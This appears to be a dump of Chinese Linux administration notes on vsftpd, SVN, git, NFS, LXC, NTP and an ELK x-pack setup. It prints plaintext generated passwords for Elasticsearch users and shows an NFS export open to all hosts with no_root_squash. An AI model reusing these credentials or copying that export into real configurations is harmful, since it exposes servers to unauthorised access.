55 | # 注意这里service.sh脚本不能使用后台启动(nohup或者&)
56 | [program:sshd]
57 | command=/usr/sbin/sshd -D
58 |
59 | [program:php]
60 | command=/usr/local/php5.6/sbin/php-fpm
61 |
--------------------------------------------------------------------------------
/chapter1/docker/23001-tu-xing-hua-guan-li-gong-ju-ff08-san-jian-ke-ff09.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/docker/23001-tu-xing-hua-guan-li-gong-ju-ff08-san-jian-ke-ff09.md
--------------------------------------------------------------------------------
/chapter1/docker/23001-tu-xing-hua-guan-li-gong-ju-ff08-san-jian-ke-ff09/1machine.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/docker/23001-tu-xing-hua-guan-li-gong-ju-ff08-san-jian-ke-ff09/1machine.md
--------------------------------------------------------------------------------
/chapter1/ftpfu-wu.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/ftpfu-wu.md
--------------------------------------------------------------------------------
/chapter1/ftpfu-wu/proftp-fu-wu.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/ftpfu-wu/proftp-fu-wu.md
--------------------------------------------------------------------------------
/chapter1/ftpfu-wu/samba-fu-wu.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/ftpfu-wu/samba-fu-wu.md
--------------------------------------------------------------------------------
/chapter1/ftpfu-wu/vsftp-fu-wu.md:
--------------------------------------------------------------------------------
1 | ###一、安装vsftpd
2 | [root@www ~]# yum -y install vsftpd
3 |
4 | ###二、配置vsftpd
5 | [root@www ~]# vi /etc/vsftpd/vsftpd.conf
6 |
7 | #关闭匿名用户
8 | anonymous_enable=NO
9 |
10 | #允许 ascii 模式
11 | ascii_upload_enable=YES
12 | ascii_download_enable=YES
13 |
14 | #不允许切换目录
15 | chroot_local_user=YES
16 | chroot_list_enable=YES
17 |
18 | #chroot_list 配置用户可以切换目录
19 | chroot_list_file=/etc/vsftpd/chroot_list
20 |
21 | # 允许执行 ls -R
22 | ls_recurse_enable=YES
23 |
24 | # 用户家目录
25 | local_root=public_html
26 |
27 | #使用本地时间
28 | use_localtime=YES
29 |
30 | [root@www ~]# vi /etc/vsftpd/chroot_list
31 | # add users who are not applied with chroot
32 | cent
33 |
34 | ###三、启动服务、开机自启动
35 | [root@www ~]# /etc/rc.d/init.d/vsftpd start
36 | Starting vsftpd for vsftpd:
37 | [ OK ]
38 | [root@www ~]# chkconfig vsftpd on
39 |
40 |
41 | ###四、定义客户端端口、防火墙允许访问vsftpd
42 |
43 | **配置被动模式**
44 |
45 | [root@www ~]# vi /etc/vsftpd/vsftpd.conf
46 | #开启被动模式,指定端口范围
47 | pasv_enable=YES
48 | pasv_min_port=21000
49 | pasv_max_port=21010
50 |
51 | [root@www ~]# /etc/rc.d/init.d/vsftpd restart
52 |
53 | **防火墙配置**
54 |
55 | [root@www ~]# iptables -I INPUT -p tcp -m state --state NEW -m tcp --dport 21 -j ACCEPT
56 | [root@www ~]# iptables -I INPUT -p tcp -m state --state NEW -m tcp --dport 21000:21010 -j ACCEPT
--------------------------------------------------------------------------------
/chapter1/gitlabfu-wu-qi-bu-shu.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/gitlabfu-wu-qi-bu-shu.md
--------------------------------------------------------------------------------
/chapter1/gitlabfu-wu-qi-bu-shu/git-fu-wu.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/gitlabfu-wu-qi-bu-shu/git-fu-wu.md
--------------------------------------------------------------------------------
/chapter1/gitlabfu-wu-qi-bu-shu/git-tou-zhi-zhen-fen-li.md:
--------------------------------------------------------------------------------
1 | ### 头指针分离
2 |
3 | **问题描述:**
4 |
5 | master 指针和 HEAD 指针 不同步移动
6 |
7 | **出现原因:**
8 |
9 | checkout 了某个具体的 commit(再提交修改后发现master 指针与HEAD指针分离)
10 |
11 | **解决办法:**
12 |
13 | # 强制将 master 分支指向当前头指针的位置
14 | git branch -f master HEAD
15 |
16 | # 检出 master 分支
17 | git checkout master
18 |
--------------------------------------------------------------------------------
/chapter1/gitlabfu-wu-qi-bu-shu/github-gao-ji-sou-suo.md:
--------------------------------------------------------------------------------
1 | ### 一、 明确搜索仓库标题、仓库描述、README
2 | **1、查找库名称**
3 |
4 | 语法:
5 | in:name 关键词
6 |
7 | 例如:
8 | in:name lvs
9 | **2、查找库描述**
10 |
11 | 语法:
12 | in:descripton 关键词
13 |
14 | 例如:
15 | in:descripton lvs
16 |
17 | **3、查找readme**
18 |
19 | 语法:
20 | in:readme 关键词
21 | 例如:
22 | in:readme lvs
23 |
24 | ### 二、 明确搜索star、fork 条件
25 | **1、查找stars 条件判断(大于、小于、范围)**
26 |
27 | 语法:
28 | stars:>数字 关键词
29 | 例如:
30 | stars:>500 lvs
31 |
32 | 语法:
33 | stars:<数字 关键词
34 | 例如:
35 | stars:<500 lvs
36 |
37 | 语法:
38 | stars:N..M 关键词
39 | 例如:
40 | stars:10..20 lvs
41 |
42 |
43 | **2、查找fork 条件判断(大于、小于、范围)**
44 |
45 | 同理:stars
46 |
47 | ### 三、明确搜索仓库大小
48 |
49 | 语法:
50 | size:>=大小 关键词
51 | 例如:
52 | size:>=5000 lvs
53 |
54 | 注意:5000 代表5M
55 |
56 | ### 四、明确仓库是否还在更新维护
57 |
58 | 语法:
59 | pushed:>时间戳 关键词
60 | 例如:
61 | pushed:>2018-01-01 lvs
62 |
63 | ### 五、明确搜索仓库的LICENSE
64 |
65 | 语法:
66 | license:协议 关键词
67 | 例如:
68 | license:apache-2.0 kubernetes
69 |
70 | ### 六、明确搜索的语言
71 |
72 | 语法:
73 | language:语言 关键词
74 | 例如:
75 | language:c lvs
76 |
77 | ### 七、明确搜索个人或组织的仓库
78 |
79 | 语法:
80 | user:用户|组织
81 | 例如:
82 | user:alibaba
83 | ### 八、其他
84 |
85 | 注意:以上的语法可以组合使用 用空格隔开
86 |
87 | 例如:
88 | language:c lvs user:alibaba
89 |
--------------------------------------------------------------------------------
/chapter1/gitlabfu-wu-qi-bu-shu/svn-fu-wu.md:
--------------------------------------------------------------------------------
1 | #SVN 管理
2 |
3 | ###一、svn 库管理
4 |
5 | **1、svn 数据库初始化**
6 |
7 | svnadmin create DIR
8 |
9 | **2、svn 查看库**
10 |
11 | svn list file:///DIR
12 |
13 | **3、svn import 初始化库**
14 |
15 | svn import dir file:///DIR/dir -m "init info"
16 |
17 | svn list file:///DIR
18 |
19 | **4、svn 数据库检出**
20 |
21 | svn checkout file:///DIR
22 | OR
23 |
24 | #简写
25 | svn co file:///DIR
26 |
27 | #指定其中一个库
28 |
29 | svn checkout file:///DIR/REPO
30 |
31 | #指定版本
32 | svn checkout -r VERSION file:///DIR
33 |
34 | **5、svn 数据库导出**
35 |
36 | svn export file:///DIR
37 |
38 | #指定版本
39 | svn export -r VESION file:///DIR
40 |
41 | #导出不包含.svn 目录
42 | 指定版本号即可
43 |
44 | ###二、svn 客户端管理
45 |
46 | **1、更新最新的工作拷贝**
47 |
48 | svn update
49 | #更新指定版本
50 | svn update -r VERSION
51 |
52 |
53 | **2、修改**
54 |
55 | svn add
56 | svn delete
57 | svn copy
58 | svn move
59 |
60 | **3、检查修改**
61 |
62 | svn status
63 | svn diff
64 |
65 | **4、取消修改**
66 |
67 | svn revert
68 |
69 | **5、解决冲突(合并别人的修改)**
70 |
71 | svn update
72 | svn resolved
73 |
74 | **6、提交你的修改**
75 |
76 | svn commit
77 |
78 | **7、状态表示**
79 |
80 | A 预定加入到版本的文件、目录或符号链接
81 | C 文件item发生冲突,在从服务器更新时与本地版本发生交迭
82 | D 文件、目录或是符号链item预定从版本库中删除
83 | M 文件item的内容被修改了
84 |
85 | ###三、svn 检验历史
86 |
87 | svn log 查看日志
88 | svn diff 显示特定修改
89 | svn cat 查看指定版本
90 | svn list 显示一个目录再某一个版本存在的文件
91 |
92 | **实例:**
93 |
94 | - **svn log**
95 |
96 |
97 | #查看版本二
98 | svn log -r 2
99 |
100 | #查看版本二,第5次修订
101 | svn log -r 2:5
102 |
103 | #查看单个文件/目录的日志
104 | svn log FILE/DIR
105 |
106 | - **svn diff**
107 |
108 |
109 | #比较本地修改
110 | svn diff
111 |
112 | #比较和指定版本(3)
113 | svn diff -r 3 FILE/DIR
114 |
115 | #比较版本2 和版本3
116 | svn diff -r 2:3 FILE/DIR
117 |
118 |
119 | - **svn cat**
120 |
121 |
122 | #查看版本2 的文件
123 | svn cat -r 2 FILE
124 |
125 |
126 | - **svn list**
127 |
128 |
129 | #查看远程目录
130 | svn list file:///DIR
131 | svn list http://DIR
132 |
133 | ###四、svn清理
134 |
135 | svn cleanup
136 |
--------------------------------------------------------------------------------
/chapter1/jiu-3001-xu-ni-hua-fu-wu.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/jiu-3001-xu-ni-hua-fu-wu.md
--------------------------------------------------------------------------------
/chapter1/liu-3001-nfs-fu-wu.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/liu-3001-nfs-fu-wu.md
--------------------------------------------------------------------------------
/chapter1/liu-3001-nfs-fu-wu/nfs-an-zhuang-bu-shu.md:
--------------------------------------------------------------------------------
1 | ###一、NFS安装
2 |
3 | [root@nfs-node2 ~]# yum -y install nfs-utils
4 | ###二、配置NFS
5 |
6 | **1、配置挂载用户及域名**
7 |
8 | [root@nfs-node2 ~]# vim /etc/idmapd.conf
9 |
10 | #如果主机名有域名解析,可以配置域名所使用根域名(二级)
11 | 5 Domain = local.domain.edu
12 |
13 | #配置挂载后的用户(配置文件也可以配置)
14 | 41 [Mapping]
15 | 42
16 | 43 Nobody-User = nobody
17 | 44 Nobody-Group = nobody
18 |
19 |
20 | **2、配置NFS主配置文件**
21 |
22 | [root@nfs-node2 ~]# vim /etc/exports
23 | /mnt/disk *(rw,no_root_squash,sync,hide,fsid=0)
24 |
25 | **3、配置NFS、RPC端口**
26 |
27 | [root@nfs-node2 ~]# vim /etc/sysconfig/nfs
28 |
29 |
30 | 20 LOCKD_TCPPORT=32803
31 |
32 | 22 LOCKD_UDPPORT=32769
33 |
34 | 57 MOUNTD_PORT=892
35 |
36 | 63 STATD_PORT=662
37 |
38 |
39 | **4、启动服务,配置开机自启动**
40 |
41 | [root@nfs-node2 ~]# /etc/init.d/rpcbind start
42 | 正在启动 rpcbind: [确定]
43 |
44 | [root@nfs-node2 ~]# /etc/init.d/nfs start
45 | 启动 NFS 服务: [确定]
46 | 关掉 NFS 配额: [确定]
47 | 启动 NFS mountd: [确定]
48 | 启动 NFS 守护进程: [确定]
49 | 正在启动 RPC idmapd: [确定]
50 |
51 |
52 | [root@nfs-node2 ~]# chkconfig rpcbind on
53 | [root@nfs-node2 ~]# chkconfig nfs on
54 |
55 | **5、配置防火墙允许访问NFS,RPC端口**
56 |
57 | [root@nfs-node2 ~]# for port in 111 662 892 2049 32803; do iptables -I INPUT -p tcp -m state --state NEW -m tcp --dport $port -j ACCEPT; done
58 |
59 | **6、客户端测试挂载**
60 |
61 | [root@nfs-node2 ~]# showmount -e localhost
62 | Export list for localhost:
63 | /mnt/disk *
64 |
65 | [root@nfs-node2 ~]# mount -t nfs localhost:/mnt/disk/ /tmp/test
66 |
67 | [root@nfs-node2 ~]# df -h
68 | Filesystem Size Used Avail Use% Mounted on
69 | /dev/sda3 20G 11G 7.7G 59% /
70 | tmpfs 1.9G 0 1.9G 0% /dev/shm
71 | /dev/sda1 190M 96M 84M 54% /boot
72 | localhost:/mnt/disk/ 20G 11G 7.7G 59% /tmp/test
73 |
74 | ###三、NFS挂载参数详解
75 |
76 | ro 只读访问
77 | rw 读写访问
78 | sync 所有数据在请求时写入共享
79 | async NFS在写入数据前可以相应请求
80 | secure NFS通过1024以下的安全TCP/IP端口发送
81 | insecure NFS通过1024以上的端口发送
82 | wdelay 如果多个用户要写入NFS目录,则归组写入(默认)
83 | no_wdelay 如果多个用户要写入NFS目录,则立即写入,当使用async时,无需此设置。
84 | hide 在NFS共享目录中不共享其子目录
85 | no_hide 共享NFS目录的子目录
86 | subtree_check 如果共享/usr/bin之类的子目录时,强制NFS检查父目录的权限(默认)
87 | no_subtree_check 和上面相对,不检查父目录权限
88 | all_squash 共享文件的UID和GID映射匿名用户anonymous,适合公用目录。
89 | no_all_squash 保留共享文件的UID和GID(默认)
90 | root_squash root用户的所有请求映射成如anonymous用户一样的权限(默认)
91 | no_root_squas root用户具有根目录的完全管理访问权限
92 | anonuid=xxx 指定NFS服务器/etc/passwd文件中匿名用户的UID
93 | anongid=xxx 指定NFS服务器/etc/passwd文件中匿名用户的GID
94 |
95 |
96 | ###四、NFS V4
97 |
98 | 略
99 |
100 |
--------------------------------------------------------------------------------
/chapter1/liu-3001-nfs-fu-wu/nfs-fsid-de-wen-ti.md:
--------------------------------------------------------------------------------
1 |
2 | **1、问题现象**
3 | 问题现象:nfs服务器对同一台机器有2个共享目录,因为fsid 设置的都是1.这是后面挂载的文件和前一个挂载文件的内容想相同
4 |
5 |
6 | /web 10.0.1.1(insecure,rw,sync,no_all_squash,hide,fsid=1,anonuid=502,anongid=502)
7 | /data 10.0.1.1(insecure,rw,sync,no_all_squash,hide,fsid=1,anonuid=502,anongid=502)
8 |
9 | mount 10.0.1.100:/web /web
10 | mount 10.0.1.100:/data /data
11 |
12 | #ls /web
13 | web.txt
14 |
15 | #ls /data
16 | web.txt
17 |
18 |
19 | **2、处理方式**
20 |
21 | #修改nfs配置、重启服务
22 | /web 10.0.1.1(insecure,rw,sync,no_all_squash,hide,fsid=1,anonuid=502,anongid=502)
23 | /data 10.0.1.1(insecure,rw,sync,no_all_squash,hide,fsid=2,anonuid=502,anongid=502)
24 |
25 |
26 |
27 | #客户端重新挂载
28 | mount -o remount 10.0.1.100:/web /web
29 | mount -o remount 10.0.1.100:/data /data
30 |
31 | #测试结果:
32 | #ls /web
33 | web.txt
34 |
35 | #ls /data
36 | data.txt
--------------------------------------------------------------------------------
/chapter1/liu-3001-nfs-fu-wu/nfs-ke-hu-duan.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/liu-3001-nfs-fu-wu/nfs-ke-hu-duan.md
--------------------------------------------------------------------------------
/chapter1/lxc.md:
--------------------------------------------------------------------------------
1 |
2 | #LXC 学习
3 |
4 | ###一、安装LXC
5 |
6 | **1、配置epel源**
7 |
8 | yum -y install epel-release
9 | **2、安装依赖包**
10 |
11 | yum install debootstrap perl libvirt
12 |
13 |
14 | **3、安装lxc**
15 |
16 | yum -y install lxc lxc-extra lxc-templates
17 |
18 | lxc 容器程序
19 | lxc-extra 容器工具
20 | lxc-templates 容器模板
21 |
22 | **4、启动服务**
23 |
24 | systemctl start lxc
25 | systemctl start libvirtd
26 | systemctl enable lxc
27 | systemctl enable libvirtd
28 |
29 | ** 5、检查配置**
30 |
31 | lxc-checkconfig
32 |
33 | ###二、容器管理
34 |
35 | **1、创建/删除容器**
36 |
37 | #创建
38 | lxc-create -t centos -n demo1
39 |
40 | -t 指定模板
41 | -n 指定名称
42 |
43 | #删除
44 | lxc-destroy -n demo1
45 |
46 |
47 | **2、查看容器**
48 |
49 | #查看有哪些容器
50 | lxc-ls
51 |
52 | #查看启动的容器
53 | lxc-ls --active
54 |
55 | #查看容器(指定格式)
56 | lxc-ls -f
57 |
58 | #查看容器的信息
59 | lxc-info -n demo1
60 | lxc-info --name demo1
61 |
62 |
63 | **3、启动/关闭/开机自启动容器**
64 |
65 | #前台启动
66 | lxc-start -n demo1
67 |
68 | #后台启动
69 | lxc-start -d -n demo1
70 |
71 | #关闭
72 | lxc-stop -n demo1
73 |
74 | #开机自启动
75 | lxc-autostart -n demo1
76 |
77 | #挂起
78 | lxc-freeze -n demo1
79 |
80 | #恢复挂起
81 | lxc-unfreeze -n demo1
82 |
83 | **4、登录容器**
84 |
85 | #console 登录
86 | lxc-console -n demo1
87 |
88 | #容器登录
89 | lxc-attach -n demo1
90 |
91 | #ssh登录
92 | 1>查看IP
93 | lxc-ls -f
94 |
95 | 2>查看密码
96 | cat /var/lib/lxc/demo1/tmp_root_pass
97 |
98 | 3>登录
99 | ssh root@xxx
100 |
101 | **5、克隆/快照管理**
102 |
103 | #克隆
104 | lxc-clone demo1 demo2
105 |
106 | #创建快照
107 | lxc-snapshot -n demo1 -c test
108 |
109 | -c 快照说明信息
110 |
111 | #删除快照
112 | lxc-snapshot -n demo1 -d SNAPSHOT
113 |
114 | #查看快照
115 | lxc-snapshot -n demo1 -L
116 | lxc-snapshot -n demo1 -L -C
117 |
118 |
119 | #恢复指定快照
120 | lxc-snapshot -n demo1 -r SNAPSHOT
121 |
122 | **6、网络管理**
123 |
124 | #桥接
125 |
126 | #nat
127 |
128 | **7、资源管理**
129 |
130 | #网卡
131 |
132 | #磁盘
133 |
134 |
135 | **8、监控**
136 |
137 | #查看指定容器
138 | lxc-monitor -n demo2
139 |
140 | #查看所有
141 | lxc-top
142 |
143 | #指定排序
144 | lxc-top -s n
145 | n 名称
146 | c cpu使用率
147 | d 磁盘使用率
148 | m 内存使用率
149 | k kernel使用率
150 |
151 | #反向排序
152 | lxc-top -r
153 |
154 | **9、其他**
155 |
156 | #执行容器命令(关机状态)
157 | lxc-execute -n demo1 -f /usr/share/lxc/config/centos.common.conf cat /etc/passwd
158 |
159 | #限制内存
160 | 1>命令行配置
161 | 设置
162 | lxc-cgroup -n demo1 memory.limit_in_bytes 512M
163 | 查看
164 | cat /sys/fs/cgroup/memory/lxc/demo1/memory.limit_in_bytes
165 | 2>配置文件
166 | vim /var/lib/lxc/demo1/config
167 | lxc.cgroup.memory.limit_in_bytes = 1G
168 |
169 | #限制cpu
170 | lxc-cgroup -n demo1 cpuset.cpus 0-1
171 | lxc-cgroup -n demo1 cpu.shares 512
172 |
173 | ###三、模板制作
174 |
175 |
--------------------------------------------------------------------------------
/chapter1/ntpfu-wu-qi-bu-shu.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/ntpfu-wu-qi-bu-shu.md
--------------------------------------------------------------------------------
/chapter1/ntpfu-wu-qi-bu-shu/chrony.md:
--------------------------------------------------------------------------------
1 | ###一、安装Chrony服务
2 |
3 | [root@nfs-node2 ~]# yum -y install chrony
4 |
5 | ###二、配置Chrony服务
6 |
7 | [root@nfs-node2 ~]# vim /etc/chrony.conf
8 | driftfile /var/lib/ntp/drift
9 | restrict default kod nomodify notrap nopeer noquery
10 | restrict -6 default kod nomodify notrap nopeer noquery
11 | restrict 127.0.0.1
12 | restrict -6 ::1
13 |
14 | #允许某个网段使用ntp服务
15 | allow 10.0.0.0/24
16 |
17 | server 0.centos.pool.ntp.org iburst
18 | server 1.centos.pool.ntp.org iburst
19 | server 2.centos.pool.ntp.org iburst
20 | server 3.centos.pool.ntp.org iburst
21 | includefile /etc/ntp/crypto/pw
22 | keys /etc/ntp/keys
23 |
24 | ###三、启动服务、配置开机自启动
25 |
26 | [root@nfs-node2 ~]#/etc/rc.d/init.d/chronyd start
27 | 正在启动 ntpd: [确定]
28 | [root@nfs-node2 ~]# chkconfig chronyd on
29 |
30 |
31 | ###四、配置防火墙允许访问Chrony服务
32 | [root@nfs-node2 ~]# iptables -I INPUT -p udp -m state --state NEW -m udp --dport 123 -j ACCEPT
33 |
34 | ###五、测试工作是否正常
35 |
36 | [root@nfs-node2 ~]# chronyc sources
37 | remote refid st t when poll reach delay offset jitter
38 | ==============================================================================
39 | *85.199.214.101 .GPS. 1 u 61 64 1 310.385 -3.302 2.834
40 | +static-5-103-13 .GPS. 1 u 122 64 2 410.189 -23.476 3.488
41 | +cn.ntp.faelix.n 185.134.196.169 2 u 57 64 3 159.115 -10.413 0.547
42 |
--------------------------------------------------------------------------------
/chapter1/ntpfu-wu-qi-bu-shu/ntp-client.md:
--------------------------------------------------------------------------------
1 | ###一、linux 配置ntp
2 |
3 | **1、安装ntp客户端**
4 |
5 | [root@nfs-node2 ~]# yum -y install ntpdate
6 |
7 | **2、同步时间**
8 |
9 | [root@nfs-node2 ~]# /usr/sbin/ntpdate nfs-node2
10 | 30 May 11:07:22 ntpdate[11925]: step time server nfs-node2 offset 1.036259 sec
11 |
12 | ###二、Windows配置ntp
13 | **1、配置ntp:**开始->控制面板 -> 日期和时间
14 |
15 | 
--------------------------------------------------------------------------------
/chapter1/ntpfu-wu-qi-bu-shu/ntpd.md:
--------------------------------------------------------------------------------
1 | ###一、安装Ntpd服务
2 |
3 | [root@nfs-node2 ~]# yum -y install ntpd
4 |
5 | ###二、配置Ntpd服务
6 |
7 | [root@nfs-node2 ~]# vim/etc/ntp.conf
8 | driftfile /var/lib/ntp/drift
9 | restrict default kod nomodify notrap nopeer noquery
10 | restrict -6 default kod nomodify notrap nopeer noquery
11 | restrict 127.0.0.1
12 | restrict -6 ::1
13 |
14 | #允许上层ntp server 修改本地时间
15 | restrict 10.0.0.0 mask 255.255.255.0 nomodify notrap
16 |
17 | server 0.centos.pool.ntp.org iburst
18 | server 1.centos.pool.ntp.org iburst
19 | server 2.centos.pool.ntp.org iburst
20 | server 3.centos.pool.ntp.org iburst
21 | includefile /etc/ntp/crypto/pw
22 | keys /etc/ntp/keys
23 |
24 | ###三、启动服务、配置开机自启动
25 |
26 | [root@nfs-node2 ~]#/etc/init.d/ntpd start
27 | 正在启动 ntpd: [确定]
28 | [root@nfs-node2 ~]# chkconfig ntpd on
29 |
30 |
31 | ###四、配置防火墙允许访问ntp服务
32 | [root@nfs-node2 ~]# iptables -I INPUT -p udp -m state --state NEW -m udp --dport 123 -j ACCEPT
33 |
34 | ###五、测试工作是否正常
35 |
36 | [root@nfs-node2 ~]# ntpq -p
37 | remote refid st t when poll reach delay offset jitter
38 | ==============================================================================
39 | *85.199.214.101 .GPS. 1 u 61 64 1 310.385 -3.302 2.834
40 | +static-5-103-13 .GPS. 1 u 122 64 2 410.189 -23.476 3.488
41 | +cn.ntp.faelix.n 185.134.196.169 2 u 57 64 3 159.115 -10.413 0.547
42 |
--------------------------------------------------------------------------------
/chapter1/ntpfu-wu-qi-bu-shu/shi-yong-an-li.md:
--------------------------------------------------------------------------------
1 | # NTP服务器搭建 #
2 | ### 一、NTP服务器规划 ###
3 | **1、同步方式:**
4 |
5 | if1: 向公网同步
6 | if2: 向if1 和公网同步 优先向if1同步
7 |
8 | **2、服务端使用方式:**
9 |
10 | 1>使用限制:只允许指定网段同步
11 | 2>安全限制:只监听内网地址
12 | 3>使用内网dns服务器 轮训策略 达到负载均衡
13 |
14 | **3、客户端使用方式:** `10分钟同步一次`
15 |
16 |
17 | ### 一、NTP服务安装 ###
18 |
19 | yum -y install ntp ntpdate
20 |
21 |
22 | ### 二、配置NTP服务 ###
23 | **1、备份配置文件:** `cp /etc/ntp.conf /etc/ntp.conf.bak`
24 |
25 | **2、修改配置文件:** `vim /etc/ntp.conf`
26 |
27 | driftfile /var/lib/ntp/drift
28 | restrict default kod nomodify notrap nopeer noquery
29 | restrict -6 default kod nomodify notrap nopeer noquery
30 |
31 | #允许10.0.0.0 网段使用ntp服务器
32 | restrict 10.0.0.0 mask 255.0.0.0 nomodify notrap
33 |
34 | restrict 127.0.0.1
35 | restrict -6 ::1
36 |
37 | #优先向该服务器同步
38 | server 0.centos.pool.ntp.org iburst prefer
39 |
40 | server 1.centos.pool.ntp.org iburst
41 | server 2.centos.pool.ntp.org iburst
42 | server 3.centos.pool.ntp.org iburst
43 |
44 | #监听IP
45 | server xxx.xxx.xxx.xxx
46 | server xxx.xxx.xxx.xxx
47 | #当服务器与公用服务器时间失去联系,以局域网 10.32.101.11 服务器为客户端提供时间同步服务
48 | fudge xxx.xxx.xxx.xxx startum 10
49 |
50 | includefile /etc/ntp/crypto/pw
51 | keys /etc/ntp/keys
52 |
53 | **3、启动服务:**`/etc/init.d/ntpd start`
54 |
55 | **4、服务开机自启动:** `chkconfig ntpd on`
56 | ###三、配置客户端 ###
57 | **1、dns 解析 **
58 |
59 | ntp.op.com -> xxx.xxx.xxx.xxx
60 |
61 | ntp.op.com -> xxx.xxx.xxx.xxx
62 |
63 |
64 |
65 |
66 | **2、客户端配置时间同步**
67 |
68 | */10 * * * * (/usr/sbin/ntpdate -s ntp.op.com && /sbin/hwclock -w) > /dev/null &
69 |
70 |
71 |
72 |
--------------------------------------------------------------------------------
/chapter1/openstack.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/openstack.md
--------------------------------------------------------------------------------
/chapter1/ri-zhi-fu-wu-qi-eflk-bu-shu.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/ri-zhi-fu-wu-qi-eflk-bu-shu.md
--------------------------------------------------------------------------------
/chapter1/ri-zhi-fu-wu-qi-eflk-bu-shu/an-zhuang-grokbug-huan-jing.md:
--------------------------------------------------------------------------------
1 | #Grok Debugger 安装
2 |
3 | ### 一、Ruby的安装
4 |
5 | #安装依赖包
6 | yum -y instal openss-devel gcc gcc-c++
7 |
8 | #下载安装ruby
9 | wget https://ruby.taobao.org/mirrors/ruby/2.1/ruby-2.1.7.tar.gz
10 | tar xf ruby-2.1.7.tar.gz
11 | cd ruby-2.1.7
12 | ./configure --prefix=/usr/local/ruby2.1.7 && make && make install
13 |
14 | #配置环境变量
15 | vim /etc/profile.d/ruby.sh
16 | export PATH=/usr/local/ruby2.1.7/bin:$PATH
17 |
18 | #重新加载环境变量
19 | source /etc/profile
20 |
21 | ###二、RubyGems 工具安装
22 | wget http://rubygems.global.ssl.fastly.net/rubygems/rubygems-2.6.2.tgz
23 | tar zxf rubygems-2.6.2.tgz
24 | cd rubygems-2.6.2
25 | ruby setup.rb
26 |
27 | ###三、替换gem 源
28 |
29 | gem sources --add https://ruby.taobao.org/ --remove https://rubygems.org/
30 | gem sources -l
31 |
32 | ###四、Grokbug 安装
33 |
34 | mkdir /usr/local/grokbug
35 | cd /usr/local/grokbug
36 | wget https://codeload.github.com/nickethier/grokdebug/zip/master
37 | unzip master
38 | mv grokdebug-master/* .
39 | rm -rf grokdebug-master/
40 |
41 | #查看组件
42 | ruby config.ru
43 |
44 | ###五、替换Google 的jquery源
45 |
46 | cd views
47 | sed -i 's#//ajax.googleapis.com/ajax/libs/jquery/1.8.1/jquery.min.js#//lib.sinaapp.com/js/jquery/1.8.1/jquery.min.js#g' index.haml
48 | sed -i 's#//ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js#//lib.sinaapp.com/js/jquery-ui/1.9.2/jquery-ui.min.js#g' index.haml
49 | sed -i 's#//ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js#//lib.sinaapp.com/js/jquery/1.7.2/jquery.min.js#g' patterns.haml
50 | sed -i 's#//ajax.googleapis.com/ajax/libs/jqueryui/1.9.0/themes/ui-lightness/jquery-ui.css#//lib.sinaapp.com/js/jquery-ui/1.9.0/themes/ui-lightness/jquery-ui.css#g' layout.haml
51 | sed -i 's#//ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js#//lib.sinaapp.com/js/jquery/1.7.2/jquery.min.js#g' discover.haml
52 |
53 | ###六、启动服务
54 |
55 | nohup bundle exec unicorn -p 8080 -c ./unicorn &
56 |
--------------------------------------------------------------------------------
/chapter1/ri-zhi-fu-wu-qi-eflk-bu-shu/an-zhuang-x-pack.md:
--------------------------------------------------------------------------------
1 | ### 一、下载x-pack
2 | cd /usr/local/src/
3 | wget https://artifacts.elastic.co/downloads/packs/x-pack/x-pack-6.1.3.zip
4 |
5 |
6 | ### 二、安装x-pack
7 |
8 | - Elasticsearch 安装
9 |
10 | cd /usr/share/elasticsearch
11 | bin/elasticsearch-plugin install file:///usr/local/src/x-pack-6.1.3.zip
12 |
13 | - Kibana 安装
14 |
15 | cd /usr/share/kibana
16 | bin/kibana-plugin install file:///usr/local/src/x-pack-6.1.3.zip
17 |
18 | - logstash 安装
19 |
20 | cd /usr/share/logstash
21 | bin/logstash-plugin install file:///usr/local/src/x-pack-6.1.3.zip
22 |
23 | ### 三、配置x-pack
24 | **1、启用x-pack**
25 |
26 | 生成密码串:`/usr/share/elasticsearch/bin/x-pack/setup-passwords auto`
27 |
28 | Changed password for user kibana
29 | PASSWORD kibana = Ef3Q!PRlJ5kzz?2zL79v
30 |
31 | Changed password for user logstash_system
32 | PASSWORD logstash_system = Pn6*Xn+3vfF~3k952Msd
33 |
34 | Changed password for user elastic
35 | PASSWORD elastic = ooPC^$-R=uUn0$IVdm_4
36 |
37 | - Elasticsearch 配置
38 |
39 | 略
40 | - Kibana 配置
41 |
42 | #vim /etc/kibana/kibana.yml
43 | 41:elasticsearch.username: "kibana"
44 | 42:elasticsearch.password: "Ef3Q!PRlJ5kzz?2zL79v"
45 |
46 | - logstash 配置
47 |
48 | #vim /etc/logstash/logstash.yml
49 | #增加
50 |
